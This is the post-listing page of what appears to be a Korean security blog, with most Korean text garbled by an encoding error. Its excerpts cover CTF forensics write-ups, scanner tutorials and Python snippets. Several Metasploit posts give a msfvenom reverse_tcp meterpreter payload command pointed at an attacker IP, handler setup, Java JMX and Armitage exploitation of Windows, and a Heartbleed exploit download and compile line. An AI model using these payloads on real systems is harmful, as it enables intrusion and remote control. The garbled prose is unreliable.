728x90 ๋ฐ์ํ ์ ์ฒด ๊ธ278 ํ๋ฆฌ์ด๋ 2016? forensic memory :) ์ด์ฉ๋ค ๋ณด๋ ์ฐพ๊ฒ ๋๋ฌธ์ !!! ํ์ด๋ณด์ !! ๊ทผ๋ฐ ๋ง๊ฒ ํธ๋์ง๋ฅผ ๋ชจ๋ฅด๊ฒ ๋ค :( ๋ฌธ์ ๋ Auth : MalwarePid_C&C_Attacker.Serverex) 123_http://www.naver.com/index.php_1.2.3.4 Hint) No ParameterHint-2) Attacker.Server on the MemoryHint-3) Attacker.Server is pharming Server ์ด๋ ๊ฒ ๋๋ค.์์ํ์ !! ํฌ์์์์ ๋์๋ผ ! volatility!!!! ๋จผ์ imageinfo ๋ฅผ ํตํด profile๊ณผ ๋ฉ๋ชจ๋ฆฌ ๋คํํ์ผ ์์ฑ ์๊ฐ์ ํ์ธ ํ pslist๋ช ๋ น์ด๋ฅผ ํตํด ํ๋ก์ธ์ค ๋ฆฌ์คํธ๋ฅผ ํ์ธ ํด๋ณด์๋ค. ๋ณด๋ค๋ณด๋ attrib.exe๋ฅผ ๋ณด๊ณ ๋ฌด์จ ํ์ผ์ธ์ง ์๋ฌธ ์ด์๊ฒผ๋ค.๋ฐ๋ก ๊ตฌ๊ธ๋ก ๋ฌ๋ ค.. Wargame/CTF(Capture The Flag) 2017. 1. 11. ์ด๋ ๋ฌธ์ ์ธ์ง ๊น๋ฌต์ ๋ฌธ์ ... ์ผ๋จ ํ์ผ์์ด ํ์ด๋ณธ๋น... ์ดํ์ผ์ด๋ค.์คํ ๊ฐ๋ ธ๊ทธ๋ํผ ๋ฌธ์ ๊ฐ๋ค. ๊ทธ๋์ ์ด๋ฒ์ ์ฌ์ฉํ ํด์ stegosolve ๋ผ๋ ๊ฒ์ด๋ค.๊ตฌ๊ธ์ stegosolve๋ฅผ ๊ฒ์ํ๋ฉด ๋ค์ด๋ฐ์ ์์๋ ๊ณณ์ด ๋์จ๋ค. ์คํ์ ํ๋ฉด ์ด๋ฌํ ์ฐฝ์ด ๋์จ๋ค! stegosolve๋ฅผ ์คํ ์ํค๋ ค๋ฉด java๊ฐ ๊ผญํ์ํ๋ค. ์ด์ file - open ํด๋ณด์์ด๋ ๊ฒ ์ด๊ณ ๋์ ํ์ดํ๋ฅผ ๋๋ฌ๋ณด์ค์!! :) ๊ณ์๋๋ฅด๋ค ๋ณด๋ฉด ๊ธ์๊ฐ ๋ณด์ธ๋ค.์ ์ฌ์ง์ blue plane 5 ์ง๋ง Gray Bit ๊น์ง ๋๊ธฐ๋ฉด์๋ก์ฝ๋กฌ :) ์ง !! Wargame/CTF(Capture The Flag) 2017. 1. 11. ๋ฉ๋ชจ๋ฆฌ ํฌ๋ ์์์ volatility ๋ฅผ ์ฌ์ฉํ๋ฉด์ ... :) ๋ฉ๋ชจ๋ฆฌ ํฌ๋ ์์ ๋น ์ ธ์ ์์ฆ ๊ณต๋ถํ๋ค๊ฐ volatility๋ฅผ ์ฌ์ฉํ๋ ๋์ค ์๋ฌธ์ด ๋ค์๋ค. ์๋ฌธ์ด๋ผ๊ธฐ ๋ณด๋จ ์ ๋ณด์ง ์์ ์๊ธด ๋ฌธ์ ์ด์ง๋ง ... ๋จผ์ imageinfo ๋ฅผ ํ์ฌ ๋ฉ๋ชจ๋ฆฌ๋คํ์ ํ๋กํ์ผ์ ํ์ธ ํ ์์๋ค...์ฌ๊ธฐ์ ์๋ฌธ์ด ๋ค์๋๋ฐ ........ ๋๋ฅ !!! BoB.vmem ํ์ผ์ ํ๋กํ์ผ์ windows XPSP2x86๊ณผ XPSP3x86 2๊ฐ๊ฐ ๋์จ๋ค... ๋ฌผ๋ก ์๋ ์ฌ๋๋ ์๋ค. ์ด๋ป๊ฒ ์๋น์คํฉ์ ์ฐพ์๋ด๋์ง... ๋์ด์๋ค๋ฉด ์๋ค... ๋ ๋์ด์์๋ค.๊ทธ๋์ ๋ช ๋ น์ด๋ฅผ ํตํด์ ์์ ๋ดค๋ค. ์ด๋ป๊ฒ? dlllist | grep xpsp2 For3nsic/The Art of Memory Forensic 2017. 1. 10. Brutal – Toolkit to quickly create various payloads,powershell and virus attacks Brutal – Toolkit to quickly create various payloads,powershell and virus attacksBrutal - ๋น ๋ฅด๊ณ ๋ค์ํ payloads, ํ์์ ธ๊ณผ ๋ฐ์ด๋ฌ์ค ๊ณต๊ฒฉ์ ์ํ ํดํท https://github.com/screetsec/brutal Metasploit 2016. 12. 28. ํดํนํ๋ ์ฒ ํ๊ธฐ!!! ๋งค์ผ ๊ณต๋ถ์ด์ผ๊ธฐ ๋ง๊ณ ์ค๋์ ๋จ๋ค์์์ ์กฐ๊ธ ์์ด ๋ณด์ด๊ณ ์ฅ๋์น๋ ํดํนํ๋ ์ฒ ํ๊ธฐ๋ฅผ ํด๋ด ์๋ค.!!! :) ๋จผ์ http://www.hackertyper.com ์ ์ ์ํด์ค๋๋ค.์ด๋ฌํ ํ๋ฉด์ด ๋จ๋ ๊ฒ์ ์์ ์๋ค. ์ฌ๊ธฐ์ f11์ ๋๋ฅด๋ฉด ์ ์ฒดํ๋ฉด์ผ๋ก ๋ฐ๋๋ค. :) ๊ทธ๋ฆฌ๊ณ ์๋ฌดํค๋ ๋ง๋๋ฅด๋ฉด ์ด๋ ๊ฒ ๊ธ์จ๊ฐ ์จ์ง๋ ๊ฒ์ ๋ณผ์ ์๋ค. My Story 2016. 12. 28. owasp zap tutorial :) owasp zap ์ owasp์์ ์คํ์์ค๋ก ๊ณต๊ฐํ ํด์ด๋ค. ๊ทธ๋ผ ๋ฌด์์ ํ๋ ํด์ธ๊ฐ? ํํ์ด์ง๋ ์๋ฒ๋ฅผ ๋ณธ์ธ ์ค์ค๋ก ์ฒดํฌํ๊ณ ์ ๊ฒํด์ฃผ๋ ์คํ ์์ค์ด๋ค. burp๋ ๋น์ทํ์ง๋ง ์คํ์์ค๋ผ๋ ์ ์์ ์ฐจ์ด์ ์ด ์๋ค. ๊ทธ๋ผ owasp๋ ๋ฌด์์ธ๊ฐ ? The Open Web Application Security Project ๋ก ์ ์ธ๊ณ์ ์ผ๋ก ๋ณด์ ์ ๋ฌธ๊ฐ๋ค์ด ๋ณด์ ์ทจ์ฝ์ ์ง๋จ ๊ธฐ์ค๊ณผ ํ์ค์ ์๋ฆฝํ๊ณ , ์น ์ดํ๋ฆฌ์ผ์ด์ ๋ณด์ ๊ด๋ จ ๋ฌธ์๋ฅผ ๋ฐฐํฌํ๊ณ ๋ณด์ ์ทจ์ฝ์ ๊ด๋ จ ํด์ ๊ฐ๋ฐํ๋ ์คํ์์ค ์ปค๋ฎค๋ํฐ์ด๋ค. ๊ณต์ ํํ์ด์ง๋ https://www.owasp.org/index.php/Main_Page ์ฌ๊ธฐ์ด๋ค. owasp zap์ ์ฌ์ดํธ๋ https://www.owasp.org/index.php/OWASP_Zed_Attack_.. Security Study/Web 2016. 12. 27. netdiscover tutorial :) netdiscover ๊ฐ์ ๊ฒฝ์ฐ์๋ ๊ธฐ๋ณธ์ ์ผ๋ก backtrack 5 ๋ kali ์ ์๋ network tool์ด๋ค. netdiscover์ active / passive scanner์ด๋ค. ์ฌ์ฉ๋ฐฉ๋ฒ์ ํ๋ฒ ์์๋ณด์ . ๊ธฐ๋ณธ์ ์ผ๋ก netdiscover ๋ง ์ ๋ ฅํด๋ ์ด๋ ๊ฒ ๋จ๋ ๊ฒ์ ์์์๋ค. ์ข๋ ๊ตฌ์ฒด์ ์ผ๋ก ์ฌ์ฉํ๊ธฐ์ํด netdiscover -h ๋ฅผ ์ ๋ ฅํ๋ฉด ๋์๋ง์ด๋์ค๋๋ฐ -r ์ต์ ์ ์ด์ฉํ์ฌ ๋์ญ๋๋ฅผ ์ค์ ํด์ค์๋ ์๋ค. Security Study/Network 2016. 12. 26. Changes in Python 3.6 1. f string formatting (PEP 498) You can avoid the inconvenience of having to kill variables when using the .format () method or%. >>> lang = 'Python' >>> author = 'Guido van Rossum' >>> 'Language: {}, Author: {}'.format(lang, author) Language: Python, Author: Guido van Rossum >>> f'Language: {lang}, Author: {author}' Language: Python, Author: Guido van Rossum 2. Type hint (PEP 484) In 3.5, type.. Language 2016. 12. 24. Hack windows XP with armitage in kali ๋ชจ๋ ์ฑ ์์ ์ฌ์ฉ์ ๋ณธ์ธ์๊ฒ ์์ต๋๋ค. ๋จผ์ service apache2 start ๋ฅผ ์คํํด์ค๋ค. ๋ค์์ service postgresql start ๋ช ๋ น์ด๋ฅผ ์คํ์ํจ ํ service metasploit start ๋ฅผ ์คํํด์ค๋ค. ๋ค์์ armitage๋ฅผ ์คํ์ํจ๋ค. ์ด๋ฌํ ์ฐฝ์ ๋ณผ์์์ ํ ๋ฐ connect๋ฅผ ๋๋ฅด๊ณ yes๋ฅผ ๋๋ฅด๊ณ ๊ธฐ๋ค๋ฆฌ๋ฉด ์~~ ์~~~ ๊ธฐ๋ค๋ฆฌ๋ฉด ์ด๋ฌํ ์ฐฝ์ด ๋ฌ๋ค. tab์ฐฝ์์ hosts -> add hosts ๋ฅผ ๋๋ฅด๋ฉด ์ด๋ ๊ฒ victim IP๋ฅผ ์ ๋ ฅํ ์์๋๋ก ๋ฌ๋ค. ๋ฑ๋กํ OS ๋ฅผ ์์๋ณด์ ๋ค์ host ํญ์์ nmap scan -> quick scan(os detect)๋ฅผ ํด๋ฆญํ๊ณ yes ๊ทธ๋ผ ์ฝ์์ฐฝ์ ์ด๋ฌํ ๊ฒ์ ํ์ธํ ์ ์๋ค. ์ด์ ์ทจ์ฝ์ ์ ์ด์ฉํ์ฌ ๊ณต๊ฒฉํ๊ธฐ ์ํด ์ด๋ ํ.. Metasploit 2016. 12. 23. how to change hostname (hostname ๋ฐ๊พธ๊ธฐ ) hostname์ด๋? ์ฐ๊ฒฐ๋ ์ฅ์น์ ์ด๋ฆ์ ๋งํ๋ค. ์ฌ๊ธฐ์ ๋ณด๋ฉด parrotsec์ด๋ ๊ฒ์ด hostname ์ด๋ค. hostname์ด๋ ๋ช ๋ น์ด๋ฅผ ์ด์ฉํ์ฌ ์ผ์์ ์ผ๋ก ๋ณ๊ฒฝ์ด ๊ฐ๋ฅํ์ง๋ง /etc/hostname์์ ๋ณ๊ฒฝ์ ํ์ฌ ๋ฐ๊ฟ ์ ์๋ค. ๋๋ฅ :) Security Study/Server(Linux) 2016. 12. 23. Kali Linux by pass - Hack Windows metasploit tutorial ๋ชจ๋ ์ฑ ์์ ์ฌ์ฉ์ ๋ณธ์ธ์๊ฒ ์์ต๋๋ค. ๋จผ์ service apache2 startservice postgresql startservice metasploit startmsfvenom -p windows/meterpreter/reverse_tcp LHOST=[attacker ip] LPORT=[์ํ๋ ํฌํธ] -f exe > filename.exe ๊ทธ๋ผ /root ํด๋์ exeํ์ผ์ด ์๊ธด๊ฒ์ ํ์ธํ ์ ์๋ค.๊ทธ๋ผ ๋ค์์ผ๋ก๋ ์ปจํธ๋กคํ ํธ๋ค๋ฌ๋ฅผ ๋ง๋ค์ด๋ณด์. ๋จผ์ msfconsole์ ์ ๋ ฅํ๋ค. use exploit/multi/handlerset payload windows/meterpreter/reverse_tcp [์ฐ๋ฆฌ๊ฐ ํ์ผ์ ๋ง๋ค๋ ์ฌ์ฉํ payload]set LHOST [attacker ip]set LP.. Metasploit 2016. 12. 22. base 64 ์ํ๋ ํ์๋งํผ decoding ํ๊ธฐ python (ํ์ผ ๋ฃ์ด์) # -*- coding:utf-8 -*- import base64 f = open("")#ํ์ผ ๋ช (๊ฒฝ๋ก) Buff = f.readlines() Buff = str(Buff) for x in range(0, 50): #50์๋ฆฌ์ ๋ฐ๋ณตํ๊ณ ์ถ์ ํ์ Buff = base64.decodestring(Buff) print Buff Language 2016. 12. 22. Hack windows with metasploit Java Applet JMX Remote Code Execution ๋ชจ๋ ์ฑ ์์ ์ฌ์ฉ์์๊ฒ ์์ต๋๋ค. ์ฐ๊ตฌ ๋ชฉ์ ์ผ๋ก๋ง ์ฌ์ฉํ์๊ธฐ ๋ฐ๋๋๋ค. ๋จผ์ ํ๊ธฐ์ ์ ๋ฆฌ๋ ์ค์์ service apache2 startservice postgresql startservice metastploit start ๋ช ๋ น์ด๋ค์ ์คํ ์์ผ์ค๋ค. ๊ทธ ํ msfconsole์ ํด์ค๋ค. ๊ทธ๋ผ ์์๊ฐ์ ์ฐฝ์ด ๋ฐ๊ฒ์ด๋ค. (๊ทธ๋ฆผ์ ๋ค๋ฅผ ์ ์๋ค.) ๊ทธ ํ ์ฐ๋ฆฌ๊ฐ ํด์ผํ ์ผ์ ํธ๋ค๋ฌ๋ฅผ ๋ง๋๋ ์ผ์ด๋ค.use exploit/multi/browser/java_jre17_jmxbean_2 ๋ช ๋ น์ด๋ฅผ ์ด์ฉํ์ฌ ํธ๋ค๋ฌ๋ฅผ ๋ง๋ ๋ค. ์ฐ๋ฆฌ๊ฐ ๋ค์ ํด์ผ ํ ํ๋์ผ๋ก show options ์ ์ด์ฉํ์ฌ ์ฐ๋ฆฌ๊ฐ ์ ํด์ค์ผํ๋ ๊ฒ์ ๋ณธ๋ค. ๋จผ์ URIPATH ๋ช ๋ น์ด๋ฅผ ์ด์ฉํ์ฌ ๊ฒฝ๋ก๋ฅผ ์ง์ ํด์ค๋ค. / ํด๋๋๊ณ test๋ฅผ ํด๋๋๋ค. ์ง์ ํ์ง.. Metasploit 2016. 12. 22. web server ์ทจ์ฝ์ ์ค์บ๋ nikto :) ์น ์๋ฒ ์ทจ์ฝ์ ์ ๊ฒ ํด์ธ nikto์ ๋ํด ์์๋ณด์ :) ๊ณต์ ํํ์ด์ง๋ https://cirt.net/Nikto2 ์ด๋ค . ์ฌ๊ธฐ์ ๋ค์ด์ ๋ฐ์ ์์๊ณ ์ค์น๋ฅผ ํ ์ ์๋ค. ๋ฆฌ๋ ์ค ๊ฐ์๊ฒฝ์ฐ apt-get install nikto ์ yum install nikto ๋ก ์ฝ๊ฒ ๋ฐ์ ์์๋ค. Mac OS๊ฐ์ ๊ฒฝ์ฐ์๋ brew install nikto ๋ฅผ ํ๋ฉด ์ฝ๊ฒ ๋ฐ์์์๋ค . ๋จผ์ ๋ช ๋ น์ด๋ฅผ ๋ณด์ ๊ฐ๋จํ๊ฒ ํฐ๋ฏธ๋์์ nikto ๋ง ์น๊ฒ ๋๋ฉด ๋์๋ง๋ค์ด ๋ํ๋๋ ๊ฒ์ ์ ์์๋ค. ์กฐ๊ธ ๋ ์์ธํ ์๊ณ ์ถ๋ค๋ฉด nikto -Help ๋ฅผ ์ ๋ ฅํ๋ค๋ฉด ์ด๋ ๊ฒ ๋ง์ ๋์๋ง์ ๋ณผ์๊ฐ ์๋ค. nikto ์ ์ฌ์ฉ๋ฒ์ ์์๋ณด๋ฉด nikto -h [HOST IP] ์ด๋ ๊ฒ๋ง ํด๋๋๋ค. ์๋ ๊ธฐ๋ณธ์ ์ผ๋ก ํฌํธ๋ 80๋ฒ์ด ๋ํดํธ ๊ฐ์ ์ง๋.. Security Study/Web 2016. 12. 21. individual bands of image.py from PIL import Imageimport numpy as np im = Image.open('heartbleed.png') # In this case, it's a 3-band (red, green, blue) image# so we'll unpack the bands into 3 separate 2D arrays.r, g, b = np.array(im).T # Let's make an alpha (transparency) band based on where blue is < 100a = np.zeros_like(b)a[b Language 2016. 12. 21. RGB image analysis.py import numpy as npimport mpl_toolkits.mplot3d.axes3d as p3import matplotlib.pyplot as pltimport colorsysfrom PIL import Image # (1) Import the file to be analyzed!img_file = Image.open("sunset.jpg")img = img_file.load() # (2) Get image width & height in pixels[xs, ys] = img_file.sizemax_intensity = 100hues = {} # (3) Examine each pixel in the image filefor x in xrange(0, xs): for y in xrange(0, .. Language 2016. 12. 21. image GPS.py from PIL import Imagefrom PIL.ExifTags import TAGS filename = "sunset.jpg"extension = filename.split('.')[-1]if (extension == 'jpg') | (extension == 'JPG') | (extension == 'jpeg') | (extension == 'JPEG') | (extension == 'PNG') |(extension == 'png'): try: img = Image.open(filename) info = img._getexif() exif = {} for tag, value in info.items(): decoded = TAGS.get(tag, tag) exif[decoded] = value #.. Language 2016. 12. 21. base image.py from PIL import Image img = Image.open("filename.jpg")print(img.size)print(img.format) img.show() Language 2016. 12. 21. Heartbleed :) ํํธ๋ธ๋ฆฌ๋ heartbleed ๋ 2015๋ ๋ณด์ ์ทจ์ฝ์ ์ค ๋ํ์ ์ธ ์ทจ์ฝ์ ์ด๋ผ ํ ์ ์๋ค. heartbleed ์ทจ์ฝ์ ์ ๊ณต๊ฒฉ์๊ฐ ์๋ฒ์ ๋ฉ๋ชจ๋ฆฌ์ ์ผ๋ถ๋ถ์ ์ฝ์ด ์ฌ ์ ์๋ openSSL์ ์ทจ์ฝ์ ์ผ๋ก ์์ฒญํ ๋ ์์ฒญํ ๋จ์ด๊ฐ ๋ง์ฝ aaa์ด๋ฉด 3๋ฐ์ดํธ๋ฅผ ์์ฒญํ๋ฉด ๋๋๋ฐ ์ด ๋ณด๋ค ๋ ํฐ ๋ฐ์ดํธ์ธ 500์ ํ๊ฒ ๋๋ค๋ฉด aaa๋ฅผ ๋ฐํํ๊ณ ๋จ์ ๋ฉ๋ชจ๋ฆฌ๋ฅผ ๋ค๋ฅธ ๊ฐ์ผ๋ก ๋ฑ์ด ์ฃผ๋ ์ทจ์ฝ์ ์ ๋งํ๋ค. ์ทจ์ฝ์ ์ ์ค์ตํด๋ณผ ๋์๋ 1. https://raw.githubusercontent.com/HackerFantastic/Public/master/exploits/heartbleed.c์ฌ๊ธฐ์ ๋ค์ด์ ๋ฐ์ ํ 2. gcc heartbleed.c -o heartbleed -Wl,-Bstatic -ssl -Wl,-Bdynamic -lssl3 .. Metasploit 2016. 12. 21. python ๊ฐ์ ํ์ผ ๋ฝ์๋ด๊ธฐ :) ์ฌ์ ํ์ผ์ ํ์ผ์ด๋ฆ๊ณผ ํด๋๋ฅผ ์ง์ ํด์ฃผ๋ฉด ์ค๋ณตํ์ผ์ ๋ฝ์์ค๋๋ค :) # -*- coding: utf-8 -*- import os f = open('/Users/z3alous/Desktop/flag1.txt', 'w') Language 2016. 12. 18. md5 ํ๋ฒ์ ์ธ์ฝ๋ฉํ๊ธฐ :) ex)ํด๋์ง์ # -*- coding: utf-8 -*-import hashlibimport os f = open('/Users/z3alous/Desktop/flag.txt', 'w') def md5(fname): hash_md5 = hashlib.md5() with open(fname, "rb") as f: for chunk in iter(lambda: f.read(4096), b""): hash_md5.update(chunk) return hash_md5.hexdigest() for root, dirs, files in os.walk('ํด๋ ๊ฒฝ๋ก'): for fname in files: full_fname = os.path.join(root, fname) f.write(md5(full_fname) + '\n') f.. Language 2016. 12. 18. nmap tutorial :) nmap์ network mapper์ ์ค์ธ๋ง๋ก ๋คํธ์ํฌ๋ฅผ ๊ฒ์ํ ๋ ๋งค์ฐ ์ข์ ํด์ด์ง๋ง ํด์ปค์๊ฒ ๊ฐํ ๋ฌด๊ธฐ๊ฐ ๋ ์ ์๋ ์คํ ์์ค ์ด๋ค. nmap์ ๊ณต์ ์ฌ์ดํธ๋ www.nmap.org ์ด๋ฉฐ ์ฐ๋ถํฌ ๊ฐ์ ๊ฒฝ์ฐ์ apt-get install nmap Security Study/Network 2016. 12. 17. V3SPA: An Open Source Tool for Visually Analyzing and Diffing SELinux/SE for Android Security Policies V3SPA: An Open Source Tool for Visually Analyzing and Diffing SELinux/SE for Android Security Policies SELinux and SE for Android can be a crucial part of securing a system, but the size and complexity of SELinux security policies make them challenging for security policy administrators to develop and maintain security policies. For example, the sesearch utility shows 94,420 allow rules in the 2.. Security Study/Server(Linux) 2016. 12. 17. youtube ๊ตฌ๋ ๋ถํ๋๋ ค์ :) subscribe plz :) ๋ณด์ ๊ด๋ จ ๋์์์ ์ฌ๋ฆด ์์ ์ ๋๋ค. :)๋ง์ ๊ตฌ๋ ๋ถํ๋๋ ค์ !! https://www.youtube.com/channel/UCn81GCH7RfiOdaZmWfng2Ng We will post security related videos. :)Many subscriptions please !! My Story 2016. 12. 16. RC3CTF_300_Breaking News 300 - Breaking NewsWe just received this transmission from our news correspondents. We need to find out what they are telling us.file ๋ฌธ์ ์ธ๋ฐ ๋ฌธ์ ์ ํ์ผ์ ๋ฐ์๋ณด๋ฉด ์์ง์ผ๋ก ํ์ผ์ ํ๋ ์ฃผ๊ณ ๊ทธ๊ฒ์ ํ๋ฉด ์ด์ ์ฐ๋ฆฌ๊ฐ ํ์ด์ผ ํ๋ ๋ฌธ์ ํ์ผ๋ค์ด ๋์จ๋ค. ๋จผ์ ํฅ์ค๋ก ํ์ผ์ ํ์ธ ํด๋ณด๋ฉด ๋ณ ํน์ดํ ๊ฒ์ด ์๋ ๊ฒ๊ฐ๋ค ํ๋ ํ๋ ๋ณด๋ ๋์ค ๋ง์ง๋ง์ base64๋ก ๋์ฝ๋ฉ์ด ๋์ด ์๋ ๊ฒ ๊ฐ์ ๋ฌธ์์ด์ ๋ฐ๊ฒฌํ๊ณ ํ๋ํ๋ ํ์ผ์์ ๊ทธ๋ฌํ ๊ธ์๋ง ๋ชจ์๋ณด์๋ค. ์ด ๋์จ ํ์ผ์ 5๊ฐ chapter 4, 9, 10, 15, 18 ์ด๋ ๊ฒ ๋์๋ค. ์ด์ base 64 decoding ์ ํด๋ณด์ base 64 ๋์ฝ๋ฉ์ ํ๋.. Wargame/CTF(Capture The Flag) 2016. 12. 16. ์ด์ 1 2 3 4 5 6 7 8 ยทยทยท 12 ๋ค์ 728x90 ๋ฐ์ํ